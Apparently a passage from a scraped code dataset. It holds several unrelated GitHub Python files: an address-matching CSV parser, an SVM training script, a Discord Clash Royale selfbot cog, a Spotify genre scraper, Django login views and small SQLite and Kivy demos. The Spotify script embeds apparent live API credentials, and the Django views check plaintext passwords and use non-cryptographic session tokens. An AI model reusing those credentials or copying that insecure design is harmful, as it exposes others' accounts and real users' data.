https://stackoverflow.com/questions/33975696/find-and-replace-multiple-comma-space-instances-in-a-string-python\npattern = re.compile(r'(,\\s){2,}')\n\n# specifies the exact location the results are stored (output csv)\noutput_path = 'out/link.csv'\n\n# the output headers\n# For example, in this example the output csv will have the headings:\n# UPRN | LMK_KEY | ...\n# These should be the unique ID attribute name from each dataset\noutput_matching_ids = ['UPRN', 'LMK_KEY']\n\n\n# helper class storing an address and an identifier\n# depending on the dataset the address came from e.g - UPRN num\n# These objects are appneded to a list during the dataset parsing procedure\nclass parsed_address:\n def __init__(self, addr, id):\n self.addr = addr\n self.id = id\n\n\n# Parse the first dataset\n# Expected Output:\n# list of parsed_address objects\ndef parse_dataset_1():\n # example code below ... 
Add your own parsing code if required\n count = 0\n sa1_l = []\n print(\"**Parsing AddressBaseCore_FULL_2020-07-20_001.csv**\", flush=True)\n\n with open(r'C:/Users/rish/Downloads/Files_For_James/AddressBaseCore/AddressBaseCore_FULL_2020-07-20_001.csv', 'r', encoding=\"utf8\") as read_obj:\n csv_dict_reader = DictReader(read_obj)\n for row in csv_dict_reader:\n if count == limit:\n break\n count += 1\n\n address = (row['ORGANISATION'] + \",\" + row['SUB_BUILDING'] + \",\" +\n row['BUILDING_NAME'] + \",\" + row['BUILDING_NUMBER'] + \",\" +\n row['STREET_NAME'] + \",\" + row['LOCALITY'] + \",\" +\n row['TOWN_NAME'] + \",\" + row['POST_TOWN'] + \",\" +\n row['ISLAND'] + \",\" + row['POSTCODE'] + \",\")\n # clean up the address removing extra commas ,\n address = (re.sub(pattern, ', ', address).lstrip(',')).rstrip(',')\n sa1_l.append(parsed_address(address, row['\\ufeffUPRN']))\n # print(address)\n return sa1_l\n\n\n# Parse the first dataset\n# Expected Output:\n# list of parsed_address objects\ndef parse_dataset_2():\n # example code below ... Add your own parsing code if required\n\n\n count = 0\n # parse the 2nd dataset\n sa2_l = []\n # iterate through all the directories to get all domestic csvs\n # src: https://stackoverflow.com/questions/2212643/python-recursive-folder-read\n # recursively go through every file from the base director root_dir\n # if the file is a csv file and is not recommendation then add it to\n # domestic_certs_paths\n root_dir = \"C:/Users/rish/Downloads/Files_For_James/non-domestic/all-non-domestic-certificates\"\n non_domestic_certs_paths = []\n for filename in glob.iglob(root_dir + '**/**', recursive=True):\n if((\"recommendations\" not in filename) and (filename.endswith(\"certificates.csv\"))):\n non_domestic_certs_paths.append(filename)\n print(\"**Parsing\", filename.rsplit(\"\\\\\", 2)[-2], \"csv **\", flush=True)\n\n # parse every csv pointed to in the list domedomestic_certs_paths\n for csv_file in non_domestic_certs_paths:\n with open(csv_file, 'r', encoding=\"utf8\") as read_obj:\n csv_dict_reader = DictReader(read_obj)\n for row in csv_dict_reader:\n if count == limit:\n break\n count += 1\n address = (row['ADDRESS1'] + \",\" + row['ADDRESS2'] + \",\" +\n row['ADDRESS3'] + \",\" + row['POSTCODE'] + \",\")\n # clean up the address removing extra commas ,\n address = (re.sub(pattern, ', ', address).lstrip(',')).rstrip(',')\n sa2_l.append(parsed_address(address, row['LMK_KEY']))\n # print(address)\n return sa2_l\n\n\n# sets up the output CSV\ndef setup_output_csv():\n # setup the output csv\n # check if the output csv already exists\n if os.path.exists(output_path):\n # then delete the file\n os.remove(output_path)\n # now create a new output csv\n open(output_path, 'w')\n # setup the csv headers\n with open(output_path, 'a') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',',\n quotechar=\"|\", quoting=csv.QUOTE_MINIMAL)\n filewriter.writerow([output_matching_ids[0], output_matching_ids[1], 'Address 1', 'Address 2', 'Tier'])\n","repo_name":"arunptl100/address-matching","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"73151265747","text":"\nfrom __init__ import get_new_experiment_folder, individual_train_path, individual_dev_path, individual_labels_path, time_series_data_path, logs_folder, vectorizer_path, pictures_folder\nfrom scipy import sparse\nfrom sklearn.svm import SVR, SVC\nfrom 
sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, StackingClassifier, StackingRegressor\nfrom sklearn.metrics import accuracy_score, f1_score, mean_absolute_error\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pdb\nimport pickle\nimport os\n\ndef save_sk_model(model):\n model_name = str(model).split('(')[0]\n experiment_folder = get_new_experiment_folder(model_name)\n model_path = os.path.join(experiment_folder, \"best.pkl\")\n with open(model_path, 'wb') as fout:\n pickle.dump(model, fout)\n\ndef train_test_a_model(mode, train_texts_vec, train_labels, dev_texts_vec, dev_labels):\n if mode == \"regression\":\n train_labels = np.array(train_labels).astype(np.float32)\n dev_labels = np.array(dev_labels).astype(np.float32)\n\n model = SVR(kernel='linear', verbose=10)\n\n metric_name = 'MAE'\n metric = mean_absolute_error\n else:\n model = SVC(kernel='linear', verbose=10)\n\n metric_name = 'f1_score'\n metric = lambda *args: f1_score(*args, average='weighted')\n \n model.fit(train_texts_vec, train_labels)\n pred_labels = model.predict(dev_texts_vec)\n metric_result = metric(dev_labels, pred_labels)\n print(f\"Model finished with {metric_name}: {metric_result}\")\n\n save_sk_model(model)\n\ndef train_individual(mode):\n train_texts_vec = sparse.load_npz(individual_train_path)\n dev_texts_vec = sparse.load_npz(individual_dev_path)\n train_labels, dev_labels = np.load(individual_labels_path, allow_pickle=True)\n\n train_test_a_model(mode, train_texts_vec, train_labels, dev_texts_vec, dev_labels)\n\ndef train_time_series(mode):\n train_text, dev_text, train_labels, dev_labels = np.load(time_series_data_path, allow_pickle=True)\n train_test_a_model(mode, train_text, train_labels, dev_text, dev_labels)\n\ndef plot_binary_classification_importance(label, word_names, features_importance, indices_):\n plt.figure(figsize=(20 * len(indices_) / 10, 7))\n plt.bar(word_names[indices_], features_importance[indices_])\n plt.title(f\"{label.title()} Orientation\")\n \n figure_path = os.path.join(pictures_folder, f\"{label}_keywords.png\")\n plt.savefig(figure_path)\n\ndef plot_svm_binary_classification_viz(vectorizer, model, topk=50):\n word_names = vectorizer.get_feature_names()\n word_names = np.array(word_names)\n \n features_importance = model.coef_.toarray()[0]\n sorted_indices = np.argsort(features_importance)\n\n worst_indices = sorted_indices[:topk]\n best_indices = sorted_indices[-topk:]\n\n plot_binary_classification_importance('negative', word_names, features_importance, worst_indices)\n plot_binary_classification_importance('positive', word_names, features_importance, best_indices)\n\ndef plot_feature_importance():\n exp_dir = os.path.join(logs_folder, 'SVC_0')\n model_path = os.path.join(exp_dir, 'best.pkl')\n with open(model_path, 'rb') as fin:\n model = pickle.load(fin)\n\n with open(vectorizer_path, 'rb') as fin:\n vectorizer = pickle.load(fin)\n \n plot_svm_binary_classification_viz(vectorizer, model)\n\nif __name__ == \"__main__\":\n # train_individual(mode=\"regression\")\n # train_individual(mode=\"classification\")\n # train_time_series(mode=\"classification\")\n plot_feature_importance()\n\n","repo_name":"ralucaginga/ERISK-2022","sub_path":"train_test_light.py","file_name":"train_test_light.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24826858512","text":"import discord\nfrom discord.ext import 
commands\nimport crasync\nimport aiohttp\nimport json\nimport os\n\n\nclass Profile:\n    '''Get info about your Profile'''\n\n    def __init__(self, bot):\n        self.bot = bot\n        with open('data/config.json') as f:\n            config = json.load(f)\n        if 'TAG' not in config:\n            tag = None\n        else:\n            tag = config['TAG']\n        self.tag = os.environ.get('TAG') or tag\n        self.client = crasync.Client()\n\n    def cdir(self, obj):\n        return [x for x in dir(obj) if not x.startswith('_')]\n\n    def get_chests(self, ctx, p):\n        cycle = p.chest_cycle\n        pos = cycle.position\n        chests = p.get_chest(0).title() + '\\n'\n        chests += '\\n'.join([p.get_chest(x).title() for x in range(1, 8)])\n        special = ''\n        for i, attr in enumerate(self.cdir(cycle)):\n            if attr != 'position':\n                e = attr.replace('_', '')\n                if getattr(cycle, attr):\n                    c_pos = int(getattr(cycle, attr))\n                    until = c_pos - pos\n                    special += f'{e.title()}+{until} '\n        return (chests, special)\n\n    @commands.command()\n    async def profile(self, ctx, tag=None):\n        '''Fetch a Clash Royale Profile'''\n        em = discord.Embed(title='Profile')\n        em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n        if tag is None:\n            tag = self.tag\n            if tag is None:\n                em.description = 'Please add `TAG` to your config.'\n                return await ctx.send(embed=em)\n        tag = tag.strip('#').replace('O', '0')\n        try:\n            profile = await self.client.get_profile(tag)\n        except Exception:\n            em.description = 'Either the API is down or that\\'s an invalid tag.'\n            return await ctx.send(embed=em)\n\n        try:\n            clan = await profile.get_clan()\n        except ValueError:\n            pass\n\n        if profile.global_rank is not None:\n            global_rank = str(profile.global_rank)\n        else:\n            global_rank = 'Unranked'\n\n        level = str(profile.level)\n        experience = str(profile.experience[0]) + '/' + str(profile.experience[1])\n        trophies = str(profile.current_trophies)\n        highest_trophies = str(profile.highest_trophies)\n        legend_trophies = str(profile.legend_trophies)\n        arena = profile.arena.name\n        win_streak = str(profile.win_streak)\n\n        donations = str(profile.total_donations)\n        win_percent = f'{(profile.wins / (profile.wins + profile.losses)*100):.3f}%'\n        record = str(profile.wins) + '-' + str(profile.draws) + '-' + str(profile.losses)\n        av = profile.clan_badge_url or 'https://i.imgur.com/Y3uXsgj.png'\n\n        chests = self.get_chests(ctx, profile)[0]\n        cycle = profile.chest_cycle\n        pos = cycle.position\n        special = ''\n\n        s = None\n        if profile.seasons:\n            s = profile.seasons[0]\n            global_r = s.end_global\n            season = f\"Highest: {s.highest} trophies\\n\" \\\n                     f\"Finish: {s.ending} trophies\\n\" \\\n                     f\"Global Rank: {global_r}\"\n        else:\n            season = None\n\n        special = self.get_chests(ctx, profile)[1]\n        shop_offers = ''\n        if profile.shop_offers.legendary:\n            shop_offers += f\"Legendary Chest: {profile.shop_offers.legendary} days\\n\"\n        if profile.shop_offers.epic:\n            shop_offers += f\"Epic Chest: {profile.shop_offers.epic} days\\n\"\n        if profile.shop_offers.arena:\n            shop_offers += f\"Arena: {profile.shop_offers.arena} days\\n\"\n\n        deck = ''\n        for card in profile.deck:\n            deck += f'{card.name}: Lvl {card.level}\\n'\n\n        em.title = profile.name\n        em.description = f'#{tag}'\n        em.url = f'http://cr-api.com/profile/{tag}'\n        em.set_author(name='Profile', icon_url=av)\n\n        em.add_field(name='Level', value=level + ' (' + experience + ')')\n        em.add_field(name='Arena', value=arena)\n\n        em.add_field(name='Trophies', value=trophies +\n                     '/' + highest_trophies + '(PB)/' + legend_trophies + ' Legend')\n        em.add_field(name='Global Rank', value=global_rank)\n        em.add_field(name='Total Donations', value=donations)\n
em.add_field(name='Win Percentage', value=win_percent)\n        em.add_field(name='Max Challenge Wins', value=str(profile.max_wins))\n        em.add_field(name='Favorite Card', value=profile.favourite_card)\n        em.add_field(name='Game Record (Win Streak)', value=record + ' (' + win_streak + ')')\n\n        if profile.clan_role:\n            em.add_field(name='Clan Info', value=clan.name +\n                         '\\n#' + clan.tag + '\\n' + profile.clan_role)\n        else:\n            em.add_field(name='Clan Info', value='No clan')\n\n        em.add_field(name='Tournament Cards Won', value=str(profile.tournament_cards_won))\n        em.add_field(name='Challenge Cards Won', value=str(profile.challenge_cards_won))\n        em.add_field(name='Battle Deck', value=deck)\n        em.add_field(name=f'Chests (Total {pos} opened)', value=chests)\n        em.add_field(name='Chests Until', value=special)\n        em.add_field(name='Shop Offers', value=shop_offers)\n        if s:\n            em.add_field(name=f'Previous Season Results (Season {s.number})', value=season)\n        else:\n            pass\n\n        em.set_thumbnail(url=profile.arena.image_url)\n        em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n                      icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n        await ctx.send(embed=em)\n\n    @commands.command()\n    async def trophies(self, ctx, tag=None):\n        '''See your current, record, and legend trophies'''\n        em = discord.Embed(title='Trophies')\n        em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n        if tag is None:\n            tag = self.tag\n        if tag is None:\n            em.description = 'Please add `TAG` to your config.'\n            return await ctx.send(embed=em)\n        try:\n            profile = await self.client.get_profile(tag)\n        except Exception:\n            em.description = 'Either the API is down or that\\'s an invalid tag.'\n            return await ctx.send(embed=em)\n\n        trophies = str(profile.current_trophies)\n        highest_trophies = str(profile.highest_trophies)\n        legend_trophies = str(profile.legend_trophies)\n\n        em.title = profile.name\n        em.set_author(\n            name='Trophies', icon_url='http://clashroyalehack1.com/wp-content/uploads/2017/06/coctrophy.png')\n        em.description = 'Trophies: `' + trophies + '`\\nPersonal Best: `' + \\\n            highest_trophies + '`\\nLegend Trophies: `' + legend_trophies + '`'\n        em.set_thumbnail(\n            url='http://vignette1.wikia.nocookie.net/clashroyale/images/7/7c/LegendTrophy.png/revision/latest?cb=20160305151655')\n        em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n                      icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n        await ctx.send(embed=em)\n\n    @commands.command()\n    async def deck(self, ctx, tag=None):\n        '''View a player's deck'''\n        em = discord.Embed(title='Battle Deck')\n        em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n        if tag is None:\n            tag = self.tag\n        if tag is None:\n            em.description = 'Please add `TAG` to your config.'\n            return await ctx.send(embed=em)\n        try:\n            profile = await self.client.get_profile(tag)\n        except Exception:\n            em.description = 'Either the API is down or that\\'s an invalid tag.'\n            return await ctx.send(embed=em)\n\n        deck = ''\n        for card in profile.deck:\n            deck += f'{card.name}: Lvl {card.level}\\n'\n\n        em.title = profile.name\n        em.set_author(name='Battle Deck', icon_url=ctx.author.avatar_url)\n        em.description = deck\n        em.set_thumbnail(\n            url='https://cdn.discordapp.com/emojis/376367875965059083.png')\n        em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n                      icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n        await ctx.send(embed=em)\n\n    @commands.command()\n    async def weburl(self, ctx, tag=None):\n        '''Get the cr-api.com url for a tag'''\n        em = 
discord.Embed(title='cr-api.com URL')\n        em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n        if tag is None:\n            tag = self.tag\n        if tag is None:\n            em.description = 'Please add `TAG` to your config.'\n            return await ctx.send(embed=em)\n        try:\n            profile = await self.client.get_profile(tag)\n        except Exception:\n            em.description = 'Either the API is down or that\\'s an invalid tag.'\n            return await ctx.send(embed=em)\n\n        em.url = f'http://cr-api.com/profile/{tag}'\n        em.title = profile.name\n        em.add_field(name='URL', value=f'http://cr-api.com/profile/{tag}')\n        em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n                      icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n        await ctx.send(embed=em)\n\n\ndef setup(bot):\n    bot.add_cog(Profile(bot))\n","repo_name":"Garcia1008/selfstats","sub_path":"cogs/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
+{"seq_id":"42726156175","text":"import spotipy\nimport json\nimport h5py\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport sqlite3\nfrom copy import deepcopy\nfrom datetime import datetime\n\n\nconn = sqlite3.connect('/users/bclark66/sp_data_for_tempo_test1922.db')\ncur = conn.cursor()\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=\"e90c5ed628d443819c60714f29cc8186\",client_secret=\"e7632ab680d44aa3ab55434315075309\")\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nregional_words = {'chinese', 'taiwan', 'traditional', 'dutch', 'euro', 'israeli', 'swedish', 'celtic',\n'italian', 'french', 'argentine', 'latin', 'spanish', 'czech', 'luxembourgian', 'brazilian', 'hungarian',\n'arab', 'german', 'danish', 'icelandic', 'glam', 'norwegian', 'turkish', 'irish', 'colombian',\n'iraqi', 'thai', 'dominican', 'indian', 'persian', 'lebanese', 'polish', 'chilean', 'sertanejo',\n'swiss', 'belarusian', 'bolivian', 'italo', 'garifuna', 'manila', 'vietnamese', 'indo', 'indonesian',\n'singaporean', 'greek', 'pakistani', 'breton', 'syrian', 'mexican', 'finnish', 'pagan', 'viking',\n'quebec', 'russian', 'romanian', 'wellington', 'cumbia', 'baile', 'latvian', 'serbian', 'slovak',\n'regional', 'suomi', 'japanese', 'croatian', 'lithuanian', 'euskal', 'perth', 'estonian', 'bahamian',\n'guinean', 'mande', 'belgian', 'yugoslav', 'portuguese', 'baltic', 'african', 'armenian', 'kosovan',\n'jewish', 'medieval', 'rune', 'brit', 'slovenian', 'sudanese', 'malian', 'ilocano', 'gothenburg',\n'pinoy', 'anime', 'korean', 'austrian', 'welsh', 'beninese', 'tunisian', 'slavic', 'algerian',\n'bulgarian', 'malaysian', 'puerto', 'rican', 'concepcion', 'maltese', 'bristol', 'galician', 'ecuadorian',\n'cook', 'islands', 'polynesian', 'peruvian', 'catalan', 'montreal', 'venezuelan', 'basque', 'panamanian',\n'nordic', 'rome', 'punjabi', 'paraguayan', 'albanian', 'national'}\n\nclassical_words = ['classical','romantic','orchestra','baroque', 'chamber','early music','opera', ]\njazz_words = ['jazz','big band','bebop','bop','fusion','swing','boogie','Dixieland','jive']\nrock_words = ['rock','metal','indie','punk','disco','reggae', 'grunge','funk','screamo','emo']\nblues_words = ['blues']\ncountry_words = ['country','folk','traditional']\nhip_hop_words = ['hip-hop','rap','trap','hip hop']\nelectronic_words = ['electronica','techno','electro','house','industrial','trance']\ndef flatten_dict(d, result=None, prv_keys=[]):\n    # Use a None sentinel: a mutable {} default would keep accumulating keys across calls.\n    if result is None:\n        result = {}\n    for k, v in d.items():\n        #print(\"k  \",k)\n        if isinstance(v, dict):\n            flatten_dict(v, 
result, prv_keys + [k])\n else:\n result['.'.join(prv_keys + [k])] = v\n\n return result\n\ndef get_artist_id(yr,c,term,category):\n if len(term.split(\" \")) > 1:\n query = 'genre:' + '\"' + term + '\" ' + yr\n else:\n query = 'genre:' + term + ' year:' + yr\n results = sp.search(query,type='track',limit=50)\n flat_result = flatten_dict(results)\n #print(flat_result.keys())\n #print(flat_result[\"tracks.total\"],\" \",flat_result[\"tracks.next\"],\" \",flat_result[\"tracks.offset\"])\n \n total = flat_result[\"tracks.total\"]\n \n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n print(\"starting year: \",yr,current_time,term,total)\n \n current = 0\n track_count = 0\n track_count_needed = c\n \n\n while current < total:\n try:\n results = sp.search(query,type='track',limit=50,offset=current)\n except Exception as toomany:\n #print(\"# of albums \",current,\" # of tracks \",track_count,toomany)\n #yr,new_current,new_classical_tracks_count,new_jazz_tracks_count,new_rock_tracks_count,new_hip_hop_tracks_count = get_artist_id(yr,c,jz,r,h)\n # classical_tracks_count += new_classical_tracks_count\n # jazz_tracks_count += new_jazz_tracks_count\n # rock_tracks_count += new_rock_tracks_count\n # hip_hop_tracks_count += new_hip_hop_tracks_count\n break\n\n flat_result = flatten_dict(results)\n x = 0\n \n\n for item in flat_result[\"tracks.items\"]:\n #print(\"keys\",item.keys())\n if 'Live' in item['name'] or 'live' in item['name']:\n #print(\"live\",item['name'])\n continue\n ts = []\n #print(\"album\",item['id'])\n if int(item[\"album\"]['release_date'][0:4]) != int(yr):\n #print(\"actual date\",int(item[\"album\"]['release_date'][0:4]))\n continue\n all_genres = []\n for artist in item[\"artists\"]:\n try: \n current_artist = sp.artist(artist[\"id\"])\n current_genres = current_artist[\"genres\"]\n for g in current_genres:\n all_genres = all_genres + current_genres\n except Exception as bad_artist:\n print(\"bad_artist for\",item[\"id\"], bad_artist)\n continue\n if term not in all_genres:\n #print(\"wrong genre\",all_genres)\n continue\n\n\n\n ts.append(item[\"id\"])\n ts.append(item['uri'])\n ts.append(item['duration_ms'])\n ts.append(item['type'])\n ts.append(item[\"name\"])\n ts.append(item['popularity'])\n ts.append(item['explicit'])\n ts.append(item['href'])\n ts.append(term)\n ts.append(int(yr))\n ts.append(category)\n \n \n \n try:\n #print(\"about to insert album\",ts[0])\n cur.execute('insert into track values (?,?,?,?,?,?,?,?,?,?,?)',ts)\n conn.commit()\n except Exception as badtrack: \n print(\"bad track\",badtrack)\n continue \n track_count += 1\n if track_count > c:\n break \n\n # # c.executemany('insert into track_artist VALUES (?,?,?)', ta)\n # i += 1 \n offset = flat_result[\"tracks.offset\"]\n if track_count > c:\n break\n \n current += 50\n #print(current)\n \n return(yr,current,track_count)\ni = 0\n#for row in c2.execute('SELECT artist_name,count(*) FROM songs group by artist_id order by 2 desc'):\n#for row in c2.execute('select tan.track_id, count(*) from track_search tan left outer join track_analysis ta on ta.track_id = tan.track_id and ta.track_id is null group by tan.track_id'):\n # if i > 60:\n # break\n # #print(row)\n # artist = row[0]\n # get_artist_id(artist)\n # i += 1\njazz_needs = [[1974,7],[1978,9],[1979,15],[1980,39],[1981,23],[1982,13],[1983,17],[1984,20],[1985,2]]\nyr = \"1980\"\nfor needed_year in range(1920,2021):\n needed_count = 100\n for term in classical_words:\n yr,current,count = 
get_artist_id(str(needed_year),needed_count,term,'classical')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in jazz_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'jazz')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in rock_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'rock')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in blues_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'blues')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in country_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'country')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in hip_hop_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'hip hop')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in electronic_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'electronic')\n needed_count -= count\n if needed_count <= 0:\n break\n# for row in c.execute('select distinct track_id from track_artist where track_id not in (select distinct track_id from track_analysis)'):\n# trks.append(row[0])\n#print(trks)\n\n","repo_name":"Computational-Cognitive-Musicology-Lab/tempo_stability","sub_path":"code/get_tracks_by_genre.py","file_name":"get_tracks_by_genre.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4407789369","text":"import random\r\nimport string\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom .models import Sesiones\r\nfrom docente.models import Docente\r\nfrom estudiante.models import Estudiante\r\nfrom .serializers import ItemSesion\r\nfrom docente.serializers import CargarDocenteSesion\r\nfrom estudiante.serializers import CargarEstudianteSesion\r\nfrom rest_framework import generics\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n\r\n@api_view(['POST'])\r\ndef iniciar_sesion(request):\r\n \"\"\"\r\n List all code Usuarios, or create a new Estudiante.\r\n \"\"\"\r\n print(request.data)\r\n if request.data['rol'] == 2:\r\n print(\"Entró a docente\")\r\n try:\r\n usuario = Docente.objects.get(idInicioSesion=request.data['username'], contrasena=request.data['password'])\r\n except Docente.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n \"\"\" serializerDocente = CargarDocenteSesion(docente, context={'request': request})\r\n usuario = serializerDocente.data \"\"\"\r\n if request.data['rol'] == 3:\r\n try:\r\n usuario = Estudiante.objects.get(idInicioSesion=request.data['username'], contrasena=request.data['password'])\r\n except Estudiante.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n \"\"\" serializerEstudiante = CargarEstudianteSesion(estudiante, context={'request': request})\r\n usuario = serializerEstudiante.data \"\"\"\r\n print(usuario)\r\n try:\r\n sesion = Sesiones.objects.get(rol=request.data['rol'], idUsuario=usuario.id)\r\n serializerSesion = ItemSesion(sesion)\r\n return Response(serializerSesion.data, status=status.HTTP_200_OK)\r\n except Sesiones.DoesNotExist:\r\n token = get_random_string(20)\r\n serializerSesion = 
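`get_artist_id` pages through search results 50 at a time by bumping `offset`. A stripped-down version of that paging loop, hedged as a sketch (the live Spotify API additionally caps how deep `offset` may go, which is why the original breaks out on exceptions):

```python
def search_all_tracks(sp, query, page_size=50):
    """Yield every track hit for `query`, one page at a time (sketch)."""
    offset = 0
    while True:
        page = sp.search(query, type='track', limit=page_size, offset=offset)
        items = page['tracks']['items']
        if not items:
            break
        yield from items
        offset += page_size
```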
ItemSesion(data={\r\n 'token': token,\r\n 'rol': request.data['rol'],\r\n 'idUsuario': usuario.id\r\n })\r\n if serializerSesion.is_valid():\r\n serializerSesion.save()\r\n return Response(serializerSesion.data, status=status.HTTP_201_CREATED)\r\n print(serializerSesion.errors)\r\n return Response(serializerSesion.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['POST'])\r\ndef cerrar_sesion(request):\r\n \"\"\"\r\n List all code Usuarios, or create a new Estudiante.\r\n \"\"\"\r\n try:\r\n sesion = Sesiones.objects.get(token=request.data['token'])\r\n sesion.delete()\r\n return Response({}, status=status.HTTP_200_OK)\r\n except Sesiones.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\ndef get_random_string(length):\r\n # Random string with the combination of lower and upper case\r\n letters = string.ascii_letters\r\n result_str = ''.join(random.choice(letters) for i in range(length))\r\n return result_str","repo_name":"ivangutierrezr/api-aprendecontuprofe","sub_path":"aprendecontuprofeapi/sesiones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24803135486","text":"from conection import Conection\n\nconn = Conection()\n\n## Create table and insert data\n\ncreate_table_string = '''\nCREATE TABLE PRODUCTS (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n ARTICLE_NAME VARCHAR(50) UNIQUE, \n PRICE INTEGER, \n SECTION VARCHAR(20)\n)'''\ninsert_data = \"INSERT INTO PRODUCTS VALUES('TV',15,'SPORTS')\"\n\n#conn.makeQuery(create_table_string)\n\nproducts_list = [\n (\"T-Shirt\", 10,\"Sports\"),\n (\"Trousers\", 30,\"Formal\"),\n (\"Socks\", 2,\"Sports\")\n]\nquery = \"INSERT INTO PRODUCTS VALUES(NULL,?,?,?)\"\n\nconn.makeQuery(query,products_list)\n\n## Get values from database\n\nquery_select = \"SELECT * FROM PRODUCTS\"\nproduct_query_list = conn.getList(query_select)\nprint(product_query_list)\n\nquery_object = \"SELECT * FROM PRODUCTS WHERE id=1\"\nresult_object = conn.getList(query_object)\nvalue = result_object[0][2]\nprint(result_object)\n\n## update objects\n\nquery_update = f'UPDATE PRODUCTS SET PRICE = {value + 10} WHERE ID = 1'\nconn.makeQuery(query_update)\nresult_object = conn.getList(query_object)\nprint(result_object)\n\n## delete products\n\nquery_delete = 'DELETE FROM PRODUCTS WHERE ID > 3'\nconn.makeQuery(query_delete)\nproduct_query_list = conn.getList(query_select)\nprint(product_query_list)\n\nconn.finish()","repo_name":"jdanielcl/python_databases_sqlite","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71128615825","text":"from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button \n\nclass MyLabel(Label):\n\tdef __init__(self,**kwargs):\n\t\tLabel.__init__(self,**kwargs)\n\t\tself.bind(size=self.setter('text_size'))\n\t\tself.padding=(20,20)\n\t\tself.font_size=24\n\t\tself.halign='center'\n\t\tself.valign='middle'\n\n\nclass Investment(App):\n\n\tdef build(self):\n\t\tlayout= GridLayout(cols=2,row_force_default=True, row_default_height=40)\n\t\t\n\t\tl1=MyLabel(text=\"Investment Amount\")\n\t\tlayout.add_widget(l1)\n\t\t\n\t\tself.t1 = TextInput(text = \"0\", multiline = 
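`get_random_string` above draws from `random.choice`, which is fine for display IDs but not for session tokens; the standard-library `secrets` module is the drop-in choice for security-sensitive randomness. A sketch of the equivalent secure helper:

```python
import secrets
import string

def get_random_token(length):
    # secrets.choice draws from the OS CSPRNG, unlike random.choice,
    # which makes the result suitable for session tokens.
    letters = string.ascii_letters
    return ''.join(secrets.choice(letters) for _ in range(length))

print(get_random_token(20))
```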
